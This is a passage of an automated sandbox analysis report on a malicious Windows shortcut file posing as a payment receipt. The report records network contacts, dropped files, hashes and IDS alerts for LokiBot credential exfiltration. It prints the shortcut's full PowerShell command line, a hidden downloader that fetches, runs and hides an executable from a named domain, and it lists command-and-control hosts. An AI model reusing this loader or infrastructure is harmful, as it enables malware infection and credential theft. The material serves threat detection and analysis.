http://www.sodiumlaurethsulfatedesyroyer.com	powershell.exe, 00000000.00000002.1487508963.00000278255C5000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://go.micro	powershell.exe, 00000000.00000002.1487508963.0000027825C2D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.ibsensoftware.com/	screens.pif, screens.pif, 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		unknown
https://www.sodiumlaurethsulfatedesyroyer.com/N	powershell.exe, 00000000.00000002.1487060690.0000027824BDF000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.microsoft.co	powershell.exe, 00000000.00000002.1541215638.000002783CF06000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://contoso.com/License	powershell.exe, 00000000.00000002.1536953245.0000027834D45000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000000.00000002.1536953245.0000027834D45000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aka.ms/winsvr-2022-pshelpX	powershell.exe, 00000000.00000002.1487508963.00000278262FE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://www.sodiumlaurethsulfatedesyroyer.com/ow	powershell.exe, 00000000.00000002.1541215638.000002783CF06000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.microsoft.co7	powershell.exe, 00000000.00000002.1541077857.000002783CD90000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.microsoft.	powershell.exe, 00000000.00000002.1487015359.0000027824BD1000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.sodiumlaurethsulfatedesyroyer.com	powershell.exe, 00000000.00000002.1487508963.00000278255BE000.00000004.00000800.00020000.00000000.sdmp	true		unknown
http://go.micros	powershell.exe, 00000000.00000002.1487508963.0000027825C2D000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://github.com/Pester/Pester	powershell.exe, 00000000.00000002.1487508963.0000027824EFA000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000000.00000002.1487508963.0000027824EFA000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/	powershell.exe, 00000000.00000002.1536953245.0000027834D45000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000000.00000002.1536953245.0000027834D45000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrg	powershell.exe, 00000000.00000002.1485393170.0000027822A18000.00000004.00000020.00020000.00000000.sdmp, Comprobante.lnk.lnk	true		unknown
https://aka.ms/pscore68	powershell.exe, 00000000.00000002.1487508963.0000027824CD1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000000.00000002.1487508963.0000027824CD1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.97.3	www.sodiumlaurethsulfatedesyroyer.com	European Union		13335	CLOUDFLARENETUS	true
45.149.241.169	freighteighttwocam.ddns.net	Germany		701	UUNETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1524797
Start date and time:	2024-10-03 09:19:29 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Comprobante.lnk.lnk
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winLNK@12/12@3/2
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 94% Number of executed functions: 109 Number of non-executed functions: 35
Cookbook Comments:	Found application associated with file extension: .lnk

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 7360 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Comprobante.lnk.lnk

Simulations

Behavior and APIs

Time	Type	Description
03:20:36	API Interceptor	42x Sleep call for process: powershell.exe modified
03:20:55	API Interceptor	94x Sleep call for process: screens.pif modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.97.3	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/758bYd86/download
	QUOTATION_OCTQTRA071244PDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/58PSl7si/download
	QUOTATION_OCTQTRA071244PDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/58PSl7si/download
	payment copy.exe	Get hash	malicious	FormBook	Browse	www.cc101.pro/0r21/
	BX7yRz7XqF.lnk	Get hash	malicious	PureLog Stealer, zgRAT	Browse	cloud.dellicon.top/1000/500/
	jKSjtQ8W7O.lnk	Get hash	malicious	PureLog Stealer, zgRAT	Browse	ministryofficedownloadcloudserver.screenpont.xyz/78/CKP/
	Shipping Documents_pdf.exe	Get hash	malicious	FormBook	Browse	www.rtprajalojago.live/7vun/
	inject.exe	Get hash	malicious	RedLine, Xmrig	Browse	joxi.net/4Ak49WQH0GE3Nr.mp3
	http://meta.case-page-appeal.eu/community-standard/208273899187123/	Get hash	malicious	Unknown	Browse	meta.case-page-appeal.eu/assets/k9854w4e5136q5a-f2169603.png
	9q24V7OSys.exe	Get hash	malicious	FormBook	Browse	www.kzeconomy.top/bopi/?-Z_XO=6kwaqb6m5omublBEUG6Q6qPKP5yOZjcuHwr6+9T02/Tvpmf8nJuTPpmClij6fvBBwm3b&zxltAx=RdCtqlAhlNvlRVfP

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
freighteighttwocam.ddns.net	Detalles_del_albaran.exe	Get hash	malicious	AsyncRAT	Browse	94.156.102.141
www.sodiumlaurethsulfatedesyroyer.com	PAGO.08.12.2024.lnk.lnk	Get hash	malicious	Unknown	Browse	188.114.96.3
	Estado de cuenta .xls	Get hash	malicious	XenoRAT	Browse	188.114.96.3
	Comprobante_Pago.08.12.2024.lnk	Get hash	malicious	Unknown	Browse	188.114.97.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.16.12
	DHL Receipt_AWB 9892671327.xls	Get hash	malicious	Unknown	Browse	172.67.216.244
	Hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	MVR-00876 CARRARO ITALIA SPA.xls	Get hash	malicious	Unknown	Browse	188.114.97.3
	Payment proof.xls	Get hash	malicious	Unknown	Browse	104.21.78.54
	5STdfnsEu5.exe	Get hash	malicious	LummaC	Browse	104.21.16.12
	MVR-00876 CARRARO ITALIA SPA.xls	Get hash	malicious	Unknown	Browse	188.114.97.3
	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	Payment proof.xls	Get hash	malicious	Unknown	Browse	104.21.78.54
UUNETUS	yakov.arm.elf	Get hash	malicious	Mirai	Browse	71.249.27.4
	yakov.m68k.elf	Get hash	malicious	Mirai	Browse	71.168.245.89
	yakov.arm7.elf	Get hash	malicious	Mirai	Browse	173.77.39.174
	yakov.mpsl.elf	Get hash	malicious	Mirai	Browse	139.4.200.165
	novo.arm.elf	Get hash	malicious	Mirai, Moobot	Browse	63.78.130.243
	novo.arm64.elf	Get hash	malicious	Mirai, Moobot	Browse	141.155.190.165
	novo.arm7.elf	Get hash	malicious	Mirai, Moobot	Browse	65.192.241.92
	novo.m68k.elf	Get hash	malicious	Mirai, Moobot	Browse	208.210.106.232
	novo.mips.elf	Get hash	malicious	Mirai, Moobot	Browse	64.36.13.201
	novo.ppc.elf	Get hash	malicious	Mirai, Moobot	Browse	149.230.228.170

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	Hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	sostener.vbs	Get hash	malicious	Njrat	Browse	188.114.97.3
	sostener.vbs	Get hash	malicious	XWorm	Browse	188.114.97.3
	file.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	file.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	T3xpD9ZaYu.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	188.114.97.3
	file.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Stealc	Browse	188.114.97.3

Process:	C:\Users\user\Desktop\screens.pif
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	706
Entropy (8bit):	5.349842958726647
Encrypted:	false
SSDEEP:	12:Q3La/hz92n4M0kvoDLI4MWuCqDLI4MWuPTAq1KDLI4M9XKbbDLI4MWuPJKAVKhav:MLU84jE4K5E4KH1qE4qXKDE4KhKiKhk
MD5:	873FA73F7EAAC5A90DC38988855C5032
SHA1:	694CDB950E35FE9EDBAE22377CBB1630F8F1DB84
SHA-256:	501001FA544E6D1C28EE3BAAAB9CC953E4421AD91222FF68C44CB5BC015D6E02
SHA-512:	3DE429FD9A218A6B491E0D9346A31E9B0418331649452B0AA161452DE6D2DA535AAA3E0FE18FE73B0A7AF77DE7C43DAD77E2C72ADFAC153A1E5EB279FAEB32B0
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:NlllulDm0ll//Z:NllU6cl/
MD5:	DA1F22117B9766A1F0220503765A5BA5
SHA1:	D35597157EFE03AA1A88C1834DF8040B3DD3F3CB
SHA-256:	BD022BFCBE39B4DA088DDE302258AE375AAFD6BDA4C7B39A97D80C8F92981C69
SHA-512:	520FA7879AB2A00C86D9982BB057E7D5E243F7FC15A12BA1C823901DC582D2444C76534E955413B0310B9EBD043400907FD412B88927DAD07A1278D3B667E3D9
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e.................................R..............@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4eyh3bmu.mud.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fqa30ycs.ic0.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gmzi4otn.c2j.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xtumicvz.4td.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\188E93\31437F.exe (copy)

Download File

Process:	C:\Users\user\Desktop\screens.pif
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	371712
Entropy (8bit):	7.854168969155107
Encrypted:	false
SSDEEP:	6144:Mt0VqnKoq12xV+0+LGQ3orU7K9ORPCfQzyI4w2Q8y7tRQG9oeGdwpx6sqyqqQlh4:MIqnJV+3GTQVzZ+MXf6Ex6sqyqqQlhcl
MD5:	DB94D5DF4ADD0A06F261EAE73C2DA5DB
SHA1:	A37FFECD4004127C3EE2E4ED8F2E5D507C418DC1
SHA-256:	8CF4CC35E623A326F1B5FE4892F5D5E44272925F33B7439E675EDFC81BA2AF70
SHA-512:	8FC3F52D241CD06DB33BCC6FB85564A4FD3EE171E154162B2FB5B1C8E63216CD0F470EBE9DDC1D5E093B4713E1E93DF33D696EED0258D89E3A33B68D47B3CC67
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...QA.f............................. ... ... ....@.. .......................@............`.................................$'..W.......8............................................................................ ............... ..H...........j1CM!e^U..... ......................@....text....... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B............. ...................... ..`........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\188E93\31437F.lck

Download File

Process:	C:\Users\user\Desktop\screens.pif
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\bb7e5d0cf2dfb2b59be71d56e848e059_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Users\user\Desktop\screens.pif
File Type:	data
Category:	dropped
Size (bytes):	45
Entropy (8bit):	0.9111711733157262
Encrypted:	false
SSDEEP:	3:/lwltAOl:WKK
MD5:	1249116D570D2994CF7B4CD674646796
SHA1:	13E7AF8AC4636DBAED0C23C14B17ACEA00F87214
SHA-256:	487DC40611285BD6566DD58CD32B8FFF1C56CCB9924EC2DCB74C76F421C8F9AD
SHA-512:	849529569C30BDAE95C6B2609A75E9B7C263E370BFB03680BF648FCE4CF9FEF9AB4AB25C4738CCC3642727B18DB68E94D97CB0D0D833E19795076FB7FDB5269B
Malicious:	false
Preview:	........................................user.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GI5H1UFK6LW59IUH41EH.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	5352
Entropy (8bit):	3.401689128097729
Encrypted:	false
SSDEEP:	48:gHjccAKmoYDgAnUFOrQlL1SogZokBasgnUFOrQlG1SogZokBaI1:gHn2jpU4cCHHBaZU4cVHHBaa
MD5:	81EC8C223BB588AD8DAF4BC867DCC0B5
SHA1:	F6E4A6D8F2E58DCB4EAEC10DA7014B0E974317FF
SHA-256:	E1317E52F65039D0FE96A919B3E89FF8CF47F418089649C52E798D9B309E34B6
SHA-512:	57EABC8EA4F78389611976DB2B7B16AC76A95337F6749D089E0A671AA152F6DAFFAA89763BE6876381E2BBEA60E853863F1D6F527E25EF7ED703BBCD1C702156
Malicious:	false
Preview:	...................................FL..................F.`.. ..._:&!w......d.....).d................................P.O. .:i.....+00.:...:..,.LB.)...A&...&......i..5q......&w......d.....t.2.....CY.: .COMPRO~1.LNK..X......EW.SCY.:....:..... ...............c.G.C.o.m.p.r.o.b.a.n.t.e...l.n.k...l.n.k.......X...............-.......W.............$`.....C:\Users\user\Desktop\Comprobante.lnk.lnk.. .c.:.\.w.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.d.d.i.s.p.l.a.y...d.l.l.........%SystemRoot%\system32\ddisplay.dll..................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.d.d.i.s.p.l.a.y...d.l.l.........................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\a5cebb9ded06a97e.customDestinations-ms (copy)

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	5352
Entropy (8bit):	3.401689128097729
Encrypted:	false
SSDEEP:	48:gHjccAKmoYDgAnUFOrQlL1SogZokBasgnUFOrQlG1SogZokBaI1:gHn2jpU4cCHHBaZU4cVHHBaa
MD5:	81EC8C223BB588AD8DAF4BC867DCC0B5
SHA1:	F6E4A6D8F2E58DCB4EAEC10DA7014B0E974317FF
SHA-256:	E1317E52F65039D0FE96A919B3E89FF8CF47F418089649C52E798D9B309E34B6
SHA-512:	57EABC8EA4F78389611976DB2B7B16AC76A95337F6749D089E0A671AA152F6DAFFAA89763BE6876381E2BBEA60E853863F1D6F527E25EF7ED703BBCD1C702156
Malicious:	false
Preview:	...................................FL..................F.`.. ..._:&!w......d.....).d................................P.O. .:i.....+00.:...:..,.LB.)...A&...&......i..5q......&w......d.....t.2.....CY.: .COMPRO~1.LNK..X......EW.SCY.:....:..... ...............c.G.C.o.m.p.r.o.b.a.n.t.e...l.n.k...l.n.k.......X...............-.......W.............$`.....C:\Users\user\Desktop\Comprobante.lnk.lnk.. .c.:.\.w.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.d.d.i.s.p.l.a.y...d.l.l.........%SystemRoot%\system32\ddisplay.dll..................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.d.d.i.s.p.l.a.y...d.l.l.........................................................................................................................................................................................................

C:\Users\user\Desktop\screens.pif

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	371712
Entropy (8bit):	7.854168969155107
Encrypted:	false
SSDEEP:	6144:Mt0VqnKoq12xV+0+LGQ3orU7K9ORPCfQzyI4w2Q8y7tRQG9oeGdwpx6sqyqqQlh4:MIqnJV+3GTQVzZ+MXf6Ex6sqyqqQlhcl
MD5:	DB94D5DF4ADD0A06F261EAE73C2DA5DB
SHA1:	A37FFECD4004127C3EE2E4ED8F2E5D507C418DC1
SHA-256:	8CF4CC35E623A326F1B5FE4892F5D5E44272925F33B7439E675EDFC81BA2AF70
SHA-512:	8FC3F52D241CD06DB33BCC6FB85564A4FD3EE171E154162B2FB5B1C8E63216CD0F470EBE9DDC1D5E093B4713E1E93DF33D696EED0258D89E3A33B68D47B3CC67
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...QA.f............................. ... ... ....@.. .......................@............`.................................$'..W.......8............................................................................ ............... ..H...........j1CM!e^U..... ......................@....text....... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B............. ...................... ..`........................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=0, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
Entropy (8bit):	2.85461617569427
TrID:	Windows Shortcut (20020/1) 100.00%
File name:	Comprobante.lnk.lnk
File size:	2'530 bytes
MD5:	8c19af87f9129a49e35158f93815eb7f
SHA1:	9a6c4b22c2e5bf7f039eb2ad20d0822c0e913d14
SHA256:	245f1f3463841248c78c4917dc1a846419f92d957132fabf0b4ee4501dcb6198
SHA512:	829aa9dea154d1ac2493bee30b32fc518f0c6a595b806aefd13652591424acf885135da1eafbb1641a40fa6d84761229ea54c45bfefa7bf3f300461043f558df
SSDEEP:	24:8z/BHYVKI1S+/CSHw7fPE+g1rwpTukQsC8bCHrPvbCfVbCp9uf254o0J5/:8z5aWXE+g1r0qkQ4EbeVg9zmo8
TLSH:	D7516524ABE51314E2F78F3D7CBAA244897A7C45FE218BCC025081891C35714E675F3B
File Content Preview:	L..................F.@...........................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................

File Icon


Icon Hash:	74f0e4e4e4e1e1ed

Static Windows Shortcut Info

General
Relative Path:	..\..\..\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe
Command Line Argument:	-ExecutionPolicy Bypass -WindowStyle hiDDEn -HiDdEn -Command ddisplay.dll;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','screens.pif');./'screens.pif';(get-item 'screens.pif').Attributes += 'Hidden';
Icon location:	c:\windows\system32\ddisplay.dll

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-03T09:20:31.352609+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49734	TCP
2024-10-03T09:20:31.352609+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49776	TCP
2024-10-03T09:20:31.352609+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49752	TCP
2024-10-03T09:20:31.352609+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49753	TCP
2024-10-03T09:20:31.352609+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49775	TCP
2024-10-03T09:20:46.743247+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49707	45.149.241.169	80	TCP
2024-10-03T09:20:46.743247+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49707	45.149.241.169	80	TCP
2024-10-03T09:20:46.743247+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49707	45.149.241.169	80	TCP
2024-10-03T09:20:47.526720+0200	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.10	49707	45.149.241.169	80	TCP
2024-10-03T09:20:47.692236+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49708	45.149.241.169	80	TCP
2024-10-03T09:20:47.692236+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49708	45.149.241.169	80	TCP
2024-10-03T09:20:47.692236+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49708	45.149.241.169	80	TCP
2024-10-03T09:20:48.453317+0200	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.10	49708	45.149.241.169	80	TCP
2024-10-03T09:20:48.567976+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49709	45.149.241.169	80	TCP
2024-10-03T09:20:48.567976+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49709	45.149.241.169	80	TCP
2024-10-03T09:20:48.567976+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49709	45.149.241.169	80	TCP
2024-10-03T09:20:56.428033+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49709	45.149.241.169	80	TCP
2024-10-03T09:20:56.428033+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49709	45.149.241.169	80	TCP
2024-10-03T09:20:56.433087+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49709	TCP
2024-10-03T09:20:56.608552+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49715	45.149.241.169	80	TCP
2024-10-03T09:20:56.608552+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49715	45.149.241.169	80	TCP
2024-10-03T09:20:56.608552+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49715	45.149.241.169	80	TCP
2024-10-03T09:20:57.649849+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49715	45.149.241.169	80	TCP
2024-10-03T09:20:57.649849+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49715	45.149.241.169	80	TCP
2024-10-03T09:20:58.057510+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49715	TCP
2024-10-03T09:20:58.316279+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49716	45.149.241.169	80	TCP
